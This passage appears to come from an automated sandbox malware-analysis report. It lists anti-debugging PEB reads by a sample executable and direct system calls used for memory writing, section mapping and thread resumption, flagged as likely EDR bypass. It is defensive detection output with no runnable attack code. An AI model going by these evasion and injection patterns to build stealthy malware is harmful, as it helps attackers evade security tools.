              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B260B mov eax, dword ptr fs:[00000030h]3_2_012B260B
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B260B mov eax, dword ptr fs:[00000030h]3_2_012B260B
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B260B mov eax, dword ptr fs:[00000030h]3_2_012B260B
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B260B mov eax, dword ptr fs:[00000030h]3_2_012B260B
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E2619 mov eax, dword ptr fs:[00000030h]3_2_012E2619
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131E609 mov eax, dword ptr fs:[00000030h]3_2_0131E609
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DA660 mov eax, dword ptr fs:[00000030h]3_2_012DA660
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DA660 mov eax, dword ptr fs:[00000030h]3_2_012DA660
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0136866E mov eax, dword ptr fs:[00000030h]3_2_0136866E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0136866E mov eax, dword ptr fs:[00000030h]3_2_0136866E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D2674 mov eax, dword ptr fs:[00000030h]3_2_012D2674
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012BC640 mov eax, dword ptr fs:[00000030h]3_2_012BC640
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DC6A6 mov eax, dword ptr fs:[00000030h]3_2_012DC6A6
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D66B0 mov eax, dword ptr fs:[00000030h]3_2_012D66B0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A4690 mov eax, dword ptr fs:[00000030h]3_2_012A4690
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A4690 mov eax, dword ptr fs:[00000030h]3_2_012A4690
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131E6F2 mov eax, dword ptr fs:[00000030h]3_2_0131E6F2
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131E6F2 mov eax, dword ptr fs:[00000030h]3_2_0131E6F2
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131E6F2 mov eax, dword ptr fs:[00000030h]3_2_0131E6F2
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131E6F2 mov eax, dword ptr fs:[00000030h]3_2_0131E6F2
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013206F1 mov eax, dword ptr fs:[00000030h]3_2_013206F1
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013206F1 mov eax, dword ptr fs:[00000030h]3_2_013206F1
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DA6C7 mov ebx, dword ptr fs:[00000030h]3_2_012DA6C7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DA6C7 mov eax, dword ptr fs:[00000030h]3_2_012DA6C7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132892A mov eax, dword ptr fs:[00000030h]3_2_0132892A
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0133892B mov eax, dword ptr fs:[00000030h]3_2_0133892B
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132C912 mov eax, dword ptr fs:[00000030h]3_2_0132C912
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01298918 mov eax, dword ptr fs:[00000030h]3_2_01298918
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01298918 mov eax, dword ptr fs:[00000030h]3_2_01298918
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131E908 mov eax, dword ptr fs:[00000030h]3_2_0131E908
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131E908 mov eax, dword ptr fs:[00000030h]3_2_0131E908
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E096E mov eax, dword ptr fs:[00000030h]3_2_012E096E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E096E mov edx, dword ptr fs:[00000030h]3_2_012E096E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012E096E mov eax, dword ptr fs:[00000030h]3_2_012E096E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01344978 mov eax, dword ptr fs:[00000030h]3_2_01344978
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01344978 mov eax, dword ptr fs:[00000030h]3_2_01344978
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C6962 mov eax, dword ptr fs:[00000030h]3_2_012C6962
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C6962 mov eax, dword ptr fs:[00000030h]3_2_012C6962
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C6962 mov eax, dword ptr fs:[00000030h]3_2_012C6962
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132C97C mov eax, dword ptr fs:[00000030h]3_2_0132C97C
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01320946 mov eax, dword ptr fs:[00000030h]3_2_01320946
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01374940 mov eax, dword ptr fs:[00000030h]3_2_01374940
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013289B3 mov esi, dword ptr fs:[00000030h]3_2_013289B3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013289B3 mov eax, dword ptr fs:[00000030h]3_2_013289B3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013289B3 mov eax, dword ptr fs:[00000030h]3_2_013289B3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A09AD mov eax, dword ptr fs:[00000030h]3_2_012A09AD
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A09AD mov eax, dword ptr fs:[00000030h]3_2_012A09AD
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B29A0 mov eax, dword ptr fs:[00000030h]3_2_012B29A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B29A0 mov eax, dword ptr fs:[00000030h]3_2_012B29A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B29A0 mov eax, dword ptr fs:[00000030h]3_2_012B29A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B29A0 mov eax, dword ptr fs:[00000030h]3_2_012B29A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B29A0 mov eax, dword ptr fs:[00000030h]3_2_012B29A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B29A0 mov eax, dword ptr fs:[00000030h]3_2_012B29A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B29A0 mov eax, dword ptr fs:[00000030h]3_2_012B29A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B29A0 mov eax, dword ptr fs:[00000030h]3_2_012B29A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B29A0 mov eax, dword ptr fs:[00000030h]3_2_012B29A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B29A0 mov eax, dword ptr fs:[00000030h]3_2_012B29A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B29A0 mov eax, dword ptr fs:[00000030h]3_2_012B29A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B29A0 mov eax, dword ptr fs:[00000030h]3_2_012B29A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B29A0 mov eax, dword ptr fs:[00000030h]3_2_012B29A0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132E9E0 mov eax, dword ptr fs:[00000030h]3_2_0132E9E0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D29F9 mov eax, dword ptr fs:[00000030h]3_2_012D29F9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D29F9 mov eax, dword ptr fs:[00000030h]3_2_012D29F9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0136A9D3 mov eax, dword ptr fs:[00000030h]3_2_0136A9D3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013369C0 mov eax, dword ptr fs:[00000030h]3_2_013369C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA9D0 mov eax, dword ptr fs:[00000030h]3_2_012AA9D0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA9D0 mov eax, dword ptr fs:[00000030h]3_2_012AA9D0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA9D0 mov eax, dword ptr fs:[00000030h]3_2_012AA9D0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA9D0 mov eax, dword ptr fs:[00000030h]3_2_012AA9D0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA9D0 mov eax, dword ptr fs:[00000030h]3_2_012AA9D0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AA9D0 mov eax, dword ptr fs:[00000030h]3_2_012AA9D0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D49D0 mov eax, dword ptr fs:[00000030h]3_2_012D49D0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134483A mov eax, dword ptr fs:[00000030h]3_2_0134483A
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134483A mov eax, dword ptr fs:[00000030h]3_2_0134483A
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C2835 mov eax, dword ptr fs:[00000030h]3_2_012C2835
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C2835 mov eax, dword ptr fs:[00000030h]3_2_012C2835
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C2835 mov eax, dword ptr fs:[00000030h]3_2_012C2835
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C2835 mov ecx, dword ptr fs:[00000030h]3_2_012C2835
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C2835 mov eax, dword ptr fs:[00000030h]3_2_012C2835
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C2835 mov eax, dword ptr fs:[00000030h]3_2_012C2835
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DA830 mov eax, dword ptr fs:[00000030h]3_2_012DA830
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132C810 mov eax, dword ptr fs:[00000030h]3_2_0132C810
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132E872 mov eax, dword ptr fs:[00000030h]3_2_0132E872
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132E872 mov eax, dword ptr fs:[00000030h]3_2_0132E872
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01336870 mov eax, dword ptr fs:[00000030h]3_2_01336870
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01336870 mov eax, dword ptr fs:[00000030h]3_2_01336870
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B2840 mov ecx, dword ptr fs:[00000030h]3_2_012B2840
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A4859 mov eax, dword ptr fs:[00000030h]3_2_012A4859
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A4859 mov eax, dword ptr fs:[00000030h]3_2_012A4859
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012D0854 mov eax, dword ptr fs:[00000030h]3_2_012D0854
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A0887 mov eax, dword ptr fs:[00000030h]3_2_012A0887
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132C89D mov eax, dword ptr fs:[00000030h]3_2_0132C89D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0136A8E4 mov eax, dword ptr fs:[00000030h]3_2_0136A8E4
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DC8F9 mov eax, dword ptr fs:[00000030h]3_2_012DC8F9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DC8F9 mov eax, dword ptr fs:[00000030h]3_2_012DC8F9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CE8C0 mov eax, dword ptr fs:[00000030h]3_2_012CE8C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_013708C0 mov eax, dword ptr fs:[00000030h]3_2_013708C0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CEB20 mov eax, dword ptr fs:[00000030h]3_2_012CEB20
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CEB20 mov eax, dword ptr fs:[00000030h]3_2_012CEB20
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01368B28 mov eax, dword ptr fs:[00000030h]3_2_01368B28
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01368B28 mov eax, dword ptr fs:[00000030h]3_2_01368B28
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131EB1D mov eax, dword ptr fs:[00000030h]3_2_0131EB1D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131EB1D mov eax, dword ptr fs:[00000030h]3_2_0131EB1D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131EB1D mov eax, dword ptr fs:[00000030h]3_2_0131EB1D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131EB1D mov eax, dword ptr fs:[00000030h]3_2_0131EB1D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131EB1D mov eax, dword ptr fs:[00000030h]3_2_0131EB1D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131EB1D mov eax, dword ptr fs:[00000030h]3_2_0131EB1D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131EB1D mov eax, dword ptr fs:[00000030h]3_2_0131EB1D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131EB1D mov eax, dword ptr fs:[00000030h]3_2_0131EB1D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131EB1D mov eax, dword ptr fs:[00000030h]3_2_0131EB1D
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01374B00 mov eax, dword ptr fs:[00000030h]3_2_01374B00
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0129CB7E mov eax, dword ptr fs:[00000030h]3_2_0129CB7E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01372B57 mov eax, dword ptr fs:[00000030h]3_2_01372B57
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01372B57 mov eax, dword ptr fs:[00000030h]3_2_01372B57
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01372B57 mov eax, dword ptr fs:[00000030h]3_2_01372B57
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01372B57 mov eax, dword ptr fs:[00000030h]3_2_01372B57
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134EB50 mov eax, dword ptr fs:[00000030h]3_2_0134EB50
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01336B40 mov eax, dword ptr fs:[00000030h]3_2_01336B40
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01336B40 mov eax, dword ptr fs:[00000030h]3_2_01336B40
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0136AB40 mov eax, dword ptr fs:[00000030h]3_2_0136AB40
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01348B42 mov eax, dword ptr fs:[00000030h]3_2_01348B42
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01298B50 mov eax, dword ptr fs:[00000030h]3_2_01298B50
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01354B4B mov eax, dword ptr fs:[00000030h]3_2_01354B4B
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01354B4B mov eax, dword ptr fs:[00000030h]3_2_01354B4B
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01354BB0 mov eax, dword ptr fs:[00000030h]3_2_01354BB0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01354BB0 mov eax, dword ptr fs:[00000030h]3_2_01354BB0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0BBE mov eax, dword ptr fs:[00000030h]3_2_012B0BBE
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0BBE mov eax, dword ptr fs:[00000030h]3_2_012B0BBE
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132CBF0 mov eax, dword ptr fs:[00000030h]3_2_0132CBF0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CEBFC mov eax, dword ptr fs:[00000030h]3_2_012CEBFC
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A8BF0 mov eax, dword ptr fs:[00000030h]3_2_012A8BF0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A8BF0 mov eax, dword ptr fs:[00000030h]3_2_012A8BF0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A8BF0 mov eax, dword ptr fs:[00000030h]3_2_012A8BF0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134EBD0 mov eax, dword ptr fs:[00000030h]3_2_0134EBD0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C0BCB mov eax, dword ptr fs:[00000030h]3_2_012C0BCB
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C0BCB mov eax, dword ptr fs:[00000030h]3_2_012C0BCB
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C0BCB mov eax, dword ptr fs:[00000030h]3_2_012C0BCB
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A0BCD mov eax, dword ptr fs:[00000030h]3_2_012A0BCD
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A0BCD mov eax, dword ptr fs:[00000030h]3_2_012A0BCD
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A0BCD mov eax, dword ptr fs:[00000030h]3_2_012A0BCD
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012CEA2E mov eax, dword ptr fs:[00000030h]3_2_012CEA2E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DCA24 mov eax, dword ptr fs:[00000030h]3_2_012DCA24
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DCA38 mov eax, dword ptr fs:[00000030h]3_2_012DCA38
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C4A35 mov eax, dword ptr fs:[00000030h]3_2_012C4A35
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012C4A35 mov eax, dword ptr fs:[00000030h]3_2_012C4A35
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0132CA11 mov eax, dword ptr fs:[00000030h]3_2_0132CA11
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DCA6F mov eax, dword ptr fs:[00000030h]3_2_012DCA6F
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DCA6F mov eax, dword ptr fs:[00000030h]3_2_012DCA6F
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012DCA6F mov eax, dword ptr fs:[00000030h]3_2_012DCA6F
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131CA72 mov eax, dword ptr fs:[00000030h]3_2_0131CA72
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0131CA72 mov eax, dword ptr fs:[00000030h]3_2_0131CA72
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0134EA60 mov eax, dword ptr fs:[00000030h]3_2_0134EA60
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0A5B mov eax, dword ptr fs:[00000030h]3_2_012B0A5B
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012B0A5B mov eax, dword ptr fs:[00000030h]3_2_012B0A5B
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A6A50 mov eax, dword ptr fs:[00000030h]3_2_012A6A50
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A6A50 mov eax, dword ptr fs:[00000030h]3_2_012A6A50
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A6A50 mov eax, dword ptr fs:[00000030h]3_2_012A6A50
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A6A50 mov eax, dword ptr fs:[00000030h]3_2_012A6A50
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A6A50 mov eax, dword ptr fs:[00000030h]3_2_012A6A50
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A6A50 mov eax, dword ptr fs:[00000030h]3_2_012A6A50
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A6A50 mov eax, dword ptr fs:[00000030h]3_2_012A6A50
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A8AA0 mov eax, dword ptr fs:[00000030h]3_2_012A8AA0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A8AA0 mov eax, dword ptr fs:[00000030h]3_2_012A8AA0
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012F6AA4 mov eax, dword ptr fs:[00000030h]3_2_012F6AA4
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AEA80 mov eax, dword ptr fs:[00000030h]3_2_012AEA80
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AEA80 mov eax, dword ptr fs:[00000030h]3_2_012AEA80
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AEA80 mov eax, dword ptr fs:[00000030h]3_2_012AEA80
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AEA80 mov eax, dword ptr fs:[00000030h]3_2_012AEA80
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AEA80 mov eax, dword ptr fs:[00000030h]3_2_012AEA80
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AEA80 mov eax, dword ptr fs:[00000030h]3_2_012AEA80
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AEA80 mov eax, dword ptr fs:[00000030h]3_2_012AEA80
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012AEA80 mov eax, dword ptr fs:[00000030h]3_2_012AEA80
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
